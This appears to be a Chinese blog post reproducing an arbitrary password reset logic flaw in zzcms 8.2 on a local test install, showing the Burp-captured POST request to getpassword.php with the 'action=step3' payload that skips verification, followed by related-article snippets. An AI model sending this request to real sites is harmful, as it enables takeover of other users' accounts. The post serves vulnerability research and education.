美文网首页缺陷相关&质量管理
逻辑漏洞之密码重置漏洞

逻辑漏洞之密码重置漏洞

作者: 二潘 | 来源:发表于2018-08-15 14:58 被阅读16次

环境:

Web: phpstudy
System: Windows 10x64
源码版本为:zzcms 8.2

漏洞详情

1、环境的搭建


image.png

2、创建数据库


image.png
3、测试是否可以访问
image.png

本地复现开始

1、首先先注册个账号,然后首页点击找回密码

image.png
2、然后退出点找回密码链接:http://127.0.0.1/one/getpassword.php

3、用burp抓包:


1.png

4、设置Payload

POST /one/getpassword.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 91
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/one/getpassword.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: timezone=8; PHPSESSID=e9nqsiqk95ilvgt98uogkp7fc6; BkGOp9578O_think_template=default; bdshare_firstime=1534304509497
Connection: close
Upgrade-Insecure-Requests: 1

password=test&action=step3&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5

5、继续Forward,账号修改成功


2.png

相关文章

  • 逻辑漏洞之密码重置漏洞

    环境: Web: phpstudySystem: Windows 10x64源码版本为:zzcms 8.2 漏洞详...

  • 逻辑漏洞

    原文链接:http://wyb0.com/posts/logical-loophole/ 逻辑漏洞 密码找回漏洞 ...

  • 【漏洞复现】zzcms8.2 任意用户密码重置

    0x01 漏洞概述 本次zzcms8.2的漏洞是任意用户密码重置,需要事先注册一个账号用来做测试,同时在找回密码的...

  • 逻辑类漏洞——任意密码重置测试

    1、验证码不失效 原因:找回密码时,获取的验证码缺少时间限制,仅判断验证码是否正确,未判断是否过期,测试方法:可通...

  • 邮件内容中请求链接可预测

    漏洞描述:邮件中的重置密码等链接可预测,导致链接可以直接被猜解访问。 测试方法: 1 先按照正常流程重置密码,接收...

  • 密码重置漏洞(平行越权)

    原理: 利用逻辑漏洞,仅仅验证短信验证码的真实性,不校验手机号码与短信验证码的绑定关系。以掌握的手机号码18868...

  • 【技术分享】赛门铁克邮件网关重置密码漏洞

    编号 CVE-2018-12242 漏洞简介 赛门铁克邮件网关10.6.6之前的所有版本,开启了重置密码功能(默认...

  • 逻辑漏洞之支付漏洞

    今个老板找我,说那个谁,你会逻辑漏洞么,你能造一个给我么,我想说,老子不会,还没张口,老板就说今天晚上发给我,客户...

  • 逻辑漏洞

    一、什么是逻辑漏洞 逻辑漏洞是指程序流程设计上存在漏洞,从而导致被黑客利用,造成业务上的危害。常见的逻辑漏洞场景有...

  • 逻辑漏洞挖掘

    逻辑漏洞介绍 逻辑漏洞就是指攻击者利用业务的设计缺陷、获取敏感信息或者破坏业务的完整性。一般出现在密码修改、越权访...

网友评论

    本文标题:逻辑漏洞之密码重置漏洞

    本文链接:https://www.haomeiwen.com/subject/tfnibftx.html